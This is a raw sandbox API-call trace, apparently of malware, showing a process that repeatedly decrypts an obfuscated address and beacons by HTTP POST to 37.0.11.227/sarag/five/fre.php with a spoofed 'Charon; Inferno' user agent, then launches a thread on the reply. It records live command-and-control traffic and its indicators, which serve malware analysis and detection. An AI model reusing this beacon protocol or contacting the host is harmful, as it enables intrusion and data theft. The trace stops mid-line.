0x755e0000 [0295.783] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0295.783] GetProcessHeap () returned 0x690000 [0295.783] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0295.783] GetProcessHeap () returned 0x690000 [0295.784] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0295.784] GetProcessHeap () returned 0x690000 [0295.784] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0295.784] GetProcessHeap () returned 0x690000 [0295.784] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0295.785] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0295.786] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0295.786] GetProcessHeap () returned 0x690000 [0295.786] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0295.786] GetProcessHeap () returned 0x690000 [0295.786] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0295.786] send (s=0x990, buf=0x6ad508*, len=242, flags=0) returned 242 [0295.787] send (s=0x990, buf=0x6aba40*, len=159, flags=0) returned 159 [0295.787] GetProcessHeap () returned 0x690000 [0295.787] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0295.787] recv (in: s=0x990, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0295.882] GetProcessHeap () returned 0x690000 [0295.883] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0295.883] GetProcessHeap () returned 0x690000 [0295.883] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0295.883] GetProcessHeap () returned 0x690000 [0295.883] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0295.884] GetProcessHeap () returned 0x690000 [0295.884] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0295.884] closesocket (s=0x990) returned 0 [0295.885] GetProcessHeap () returned 0x690000 [0295.885] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0295.885] GetProcessHeap () returned 0x690000 [0295.885] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0295.885] GetProcessHeap () returned 0x690000 [0295.885] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0295.886] GetProcessHeap () returned 0x690000 [0295.886] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0295.886] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x136c) returned 0x990 [0295.888] Sleep (dwMilliseconds=0xea60) [0295.889] GetProcessHeap () returned 0x690000 [0295.889] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0295.890] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.891] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0295.896] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.897] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0295.904] GetProcessHeap () returned 0x690000 [0295.904] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0295.904] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.905] CryptImportKey (in: hProv=0x6af100, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0295.906] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.906] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0295.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.914] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0295.914] GetProcessHeap () returned 0x690000 [0295.915] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0295.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.916] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0295.917] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.917] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0295.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.918] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0295.918] GetProcessHeap () returned 0x690000 [0295.918] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0295.919] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.919] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0295.920] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.921] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0295.921] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.922] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0295.922] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.923] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0295.923] GetProcessHeap () returned 0x690000 [0295.923] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0295.923] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0295.923] GetProcessHeap () returned 0x690000 [0295.923] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0295.924] GetProcessHeap () returned 0x690000 [0295.924] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0295.924] GetProcessHeap () returned 0x690000 [0295.925] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0295.925] GetProcessHeap () returned 0x690000 [0295.925] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0295.925] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.926] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0295.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.931] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0295.938] GetProcessHeap () returned 0x690000 [0295.939] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0295.939] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.940] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0295.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.941] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0295.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.942] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0295.942] GetProcessHeap () returned 0x690000 [0295.942] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0295.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.944] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0295.945] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.945] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0295.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0295.946] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0295.946] GetProcessHeap () returned 0x690000 [0295.946] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0295.947] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.947] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0295.948] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.948] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0295.949] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.949] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0295.950] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0295.950] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0295.950] GetProcessHeap () returned 0x690000 [0295.950] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0295.951] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0295.951] GetProcessHeap () returned 0x690000 [0295.951] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0295.951] socket (af=2, type=1, protocol=6) returned 0x994 [0295.951] connect (s=0x994, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0295.979] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0295.979] GetProcessHeap () returned 0x690000 [0295.979] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0295.979] GetProcessHeap () returned 0x690000 [0295.979] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0295.980] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0295.980] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0295.980] GetProcessHeap () returned 0x690000 [0295.981] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0295.981] GetProcessHeap () returned 0x690000 [0295.981] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0295.981] GetProcessHeap () returned 0x690000 [0295.981] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0295.981] GetProcessHeap () returned 0x690000 [0295.981] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0295.982] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0295.983] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0295.983] GetProcessHeap () returned 0x690000 [0295.983] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0295.983] GetProcessHeap () returned 0x690000 [0295.983] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0295.984] send (s=0x994, buf=0x6ad508*, len=242, flags=0) returned 242 [0295.984] send (s=0x994, buf=0x6aba40*, len=159, flags=0) returned 159 [0295.984] GetProcessHeap () returned 0x690000 [0295.984] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0295.984] recv (in: s=0x994, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0296.059] GetProcessHeap () returned 0x690000 [0296.060] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0296.060] GetProcessHeap () returned 0x690000 [0296.060] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0296.061] GetProcessHeap () returned 0x690000 [0296.061] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0296.061] GetProcessHeap () returned 0x690000 [0296.061] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0296.061] closesocket (s=0x994) returned 0 [0296.061] GetProcessHeap () returned 0x690000 [0296.062] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0296.062] GetProcessHeap () returned 0x690000 [0296.062] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0296.062] GetProcessHeap () returned 0x690000 [0296.062] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0296.062] GetProcessHeap () returned 0x690000 [0296.063] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0296.067] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1458) returned 0x994 [0296.069] Sleep (dwMilliseconds=0xea60) [0296.071] GetProcessHeap () returned 0x690000 [0296.071] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0296.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.073] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0296.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.090] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0296.101] GetProcessHeap () returned 0x690000 [0296.101] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0296.102] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.110] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0296.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.111] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0296.112] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.112] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0296.112] GetProcessHeap () returned 0x690000 [0296.113] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0296.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.114] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0296.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.115] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0296.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.116] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0296.116] GetProcessHeap () returned 0x690000 [0296.116] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0296.120] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.120] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0296.121] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.121] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0296.122] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.122] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0296.123] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.123] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0296.123] GetProcessHeap () returned 0x690000 [0296.123] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0296.123] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0296.124] GetProcessHeap () returned 0x690000 [0296.124] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0296.124] GetProcessHeap () returned 0x690000 [0296.125] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0296.125] GetProcessHeap () returned 0x690000 [0296.126] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0296.126] GetProcessHeap () returned 0x690000 [0296.126] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0296.127] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.127] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0296.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.133] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0296.142] GetProcessHeap () returned 0x690000 [0296.142] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0296.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.143] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0296.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.144] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0296.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.145] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0296.145] GetProcessHeap () returned 0x690000 [0296.145] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0296.146] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.146] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0296.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.148] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0296.148] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.149] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0296.149] GetProcessHeap () returned 0x690000 [0296.149] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0296.150] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.152] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0296.153] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.153] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0296.154] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.155] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0296.155] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.156] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0296.156] GetProcessHeap () returned 0x690000 [0296.156] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0296.156] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0296.156] GetProcessHeap () returned 0x690000 [0296.156] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab440 [0296.156] socket (af=2, type=1, protocol=6) returned 0x998 [0296.156] connect (s=0x998, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0296.182] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0296.182] GetProcessHeap () returned 0x690000 [0296.182] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0296.182] GetProcessHeap () returned 0x690000 [0296.182] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0296.186] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0296.187] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0296.187] GetProcessHeap () returned 0x690000 [0296.187] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0296.187] GetProcessHeap () returned 0x690000 [0296.188] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0296.188] GetProcessHeap () returned 0x690000 [0296.188] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0296.188] GetProcessHeap () returned 0x690000 [0296.188] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0296.189] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0296.190] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; 